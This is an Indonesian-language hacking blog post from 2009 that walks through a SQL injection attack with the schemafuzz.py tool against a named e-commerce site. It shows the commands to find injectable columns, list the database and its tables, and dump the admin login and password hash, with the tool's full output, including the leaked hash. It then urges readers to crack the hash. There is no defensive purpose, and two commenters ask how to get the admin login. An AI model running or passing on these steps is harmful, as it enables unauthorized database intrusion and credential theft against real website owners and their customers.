Selasa, 2017-09-26, 6:43 AM
Welcome Guest | RSS

SikuruZ Cyber

Site menu

Section categories

Hacking [9]
aLL About hacking
Tutorial [26]
Tutorial
Programing [3]
Programing
Malware [4]
Virus
Puisi dan Sajak [5]
Buatan SikuruZ
Islam [7]
About Islam
Dunia [9]
Dunia Dan Seisi Nya...
Humor... [11]
Cerita Lucu
Sma N 1 LLG [3]
Tugas Dll.

Our poll

Presiden Kalian
Total of answers: 14

Statistics

Main » 2009 » August » 7 » schemafuzz.py
8:43 AM
schemafuzz.py
Bahan-bahan yg harus disiapkan :
1.Python , donlot di http://www.python.org/ftp/python/2.5/python-2.5.msi
2.Schemafuzz >>> http://darkc0de.com/others/schemafuzz.py
3.CMD

Gunakan CMD , masuk ke folder schemafuzz.py
Dengan perintah >> schemafuzz.py -u "target" --perintah

Utk lebih jelasnya,,langsung ke TKP ,, wkwkwkwk

1.Cari target ,, ini target kita >>>
http://www.sleeppost.com/viewproduct.php?pid=923

2.Cek columnnya
Code:
schemafuzz.py -u "http://www.sleeppost.com/viewproduct.php?pid=923" --findcol


maka akan keluar :

Quote:
+] URL: http://www.sleeppost.com/viewproduct.php?pid=923--
+] Evasion Used: "+" "--"
+] 09:44:10
-] Proxy Not Given
+] Attempting To find the number of columns...
+] Testing: 0,1,2,3,4,5,6,
+] Column Length is: 7
+] Found null column at column #: 0
+] SQLi URL: http://www.sleeppost.com/viewproduct.php?pid=923+AND+1=2+UNION+SEL
CT+0,1,2,3,4,5,6--
+] darkc0de URL: http://www.sleeppost.com/viewproduct.php?pid=923+AND+1=2+UNION
SELECT+darkc0de,1,2,3,4,5,6
-] Done!



Nah kita gunakan ini http://www.sleeppost.com/viewproduct.php?pid=923+AND+1=2+UNION+
SELECT+darkc0de,1,2,3,4,5,6 utk nginject.


3.Cari db nya
Code:
schemafuzz.py -u "http://www.sleeppost.com/viewproduct.php?pid=923+AND+1=2+UNION+
SELECT+darkc0de,1,2,3,4,5,6" --dbs


Quote:

[+] URL: http://www.sleeppost.com/viewproduct.php?pid=923+AND+1=2+UNION+SELECT+d
arkc0de,1,2,3,4,5,6--
[+] Evasion Used: "+" "--"
[+] 09:56:47
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: sleeppo_store
User: sleeppo_admin@web.readyserver.net
Version: 5.0.67-log
[+] Showing all databases current user has access too!
[+] Number of Databases: 1

[0] ??sleeppo_store?

[-] 09:57:00
[-] Total URL Requests 3
[-] Done


Tuh kan keliatan db nya,,wkwkwkkw sleeppo_store


4.Cari nama tabel dalam db
Code:
schemafuzz.py -u "http://www.sleeppost.com/viewproduct.php?pid=923+AND+1=2+UNION+
SELECT+darkc0de,1,2,3,4,5,6" --schema -D sleeppo_store


Quote:

[+] URL: http://www.sleeppost.com/viewproduct.php?pid=923+AND+1=2+UNION+SELECT+d
arkc0de,1,2,3,4,5,6--
[+] Evasion Used: "+" "--"
[+] 10:02:56
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: sleeppo_store
User: sleeppo_admin@web.readyserver.net
Version: 5.0.67-log
[+] Showing Tables & Columns from database "sleeppo_store"
[+] Number of Tables: 20

[Database]: sleeppo_store
[Table: Columns]

[0]advertisement: id,image,url
[1]brands: name
[2]category: cid,parent,name
[3]config: adminemail1,adminemail2,adminemail3,salesemail,enquiryemail,adminlogi
n,adminpassword,orderemailsubject,orderemailheader,orderemailfooter,orderwebhead
er,orderwebfooter,sms
[4]emailgroup: gid,name
[5]emailgroupmember: gid,email
[6]emails: email,name
[7]faqreply: fid,faqquestion,faqanswer,fdate
[8]faqrequest: fid,email,faqquestion,fdate,status,name,contact
[9]news: nid,title,detail,ndate,link_cid,link_pid,active
[10]orderitem: ordernum,pid,pname,vid,brand,variance,price,sellprice,discount,qty,type
[11]orders: ordernum,name,email,contact,address,status,country,ddate,dname,demai
l,dcontact,daddress,dcountry,paytype,worldpayid,ttime,remarks,refno,deliverydate
,deliverytime,paymentmode,remarks2
[12]outlet: outlet_id,outlet_name,outlet_address,outlet_tel
[13]product: pid,cid,brand,name,pno,detail,recommend
[14]productrel: pid,vtype,variance
[15]productvariance: vid,pid,variance,thick,vtype,vno,detail,price,sellprice,firm,colour
[16]promotionitems: id,promotion_id,item_type,cid,brand,pid,vid,discount,rating
[17]promotions: promotion_id,title,detail,startdate,enddate
[18]users: uid,name,email,contact,address
[19]warranty: wid,name,address,email,submitdate,date,invoice,model,size,period,s
urvey,qty

[-] 10:24:51
[-] Total URL Requests 139
[-] Done


Berarti itu site punya 20 tabel,kolomnya juga ada tuh.Tinggal pilih yg mana yg mau di exploit :p


5.Exploit tabel n kolom
Code:
schemafuzz.py -u "http://www.sleeppost.com/viewproduct.php?pid=923+AND+1=2+UNION+
SELECT+darkc0de,1,2,3,4,5,6" --dump -D sleeppo_store -T config -C adminlogin,adminpassword


Quote:

[+] URL: http://www.sleeppost.com/viewproduct.php?pid=923+AND+1=2+UNION+SELECT+d
arkc0de,1,2,3,4,5,6--
[+] Evasion Used: "+" "--"
[+] 10:36:59
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: sleeppo_store
User: sleeppo_admin@web.readyserver.net
Version: 5.0.67-log
[+] Dumping data from database "sleeppo_store" Table "config"
[+] and Column(s) ['adminlogin', 'adminpassword']
[+] Number of Rows: 3

[0] liphong:16a8c2870e2d639a58e46bfd58ff9c5c:NoDataInColumn:
[1] No data
[2] No data
[3] No data

[-] 10:37:36
[-] Total URL Requests 5
[-] Done


xixixi...itu user ama passnya udah kliatan,,passnya tgl di decrypt aje Wink

Cara diatas berlaku untuk sql versi 5 , utk versi 4 gunakan perintah --fuzz untuk menemukan nama tabel n kolom

ex :
Code:
schemafuzz.py -u "http://www.sleeppost.com/viewproduct.php?pid=923+AND+1=2+UNION+
SELECT+darkc0de,1,2,3,4,5,6" --fuzz


Beberapa perintah :
--fuzz >>> mencari nama kolom n tabel pada sql v 4
--schema >>> melihat nama tabel
--dump >>> melihat isi kolom
--findcol >>> menemukan dakc0de ( colom )

Silahkan cari yg laen.Baca aja help nya :p

Semoga bermaanfaat Smile

copas[at]cyberdos.org

Category: Hacking | Views: 473 | Added by: SikuruZ | Rating: 0.0/0
Total comments: 2
2  
trus cara nyari login adminnya gmn kk??

1  
terus cara nyari login adminnya gmn kk???

Only registered users can add comments.
[ Registration | Login ]

Search

Calendar

«  August 2009  »
SuMoTuWeThFrSa
      1
2345678
9101112131415
16171819202122
23242526272829
3031

Site friends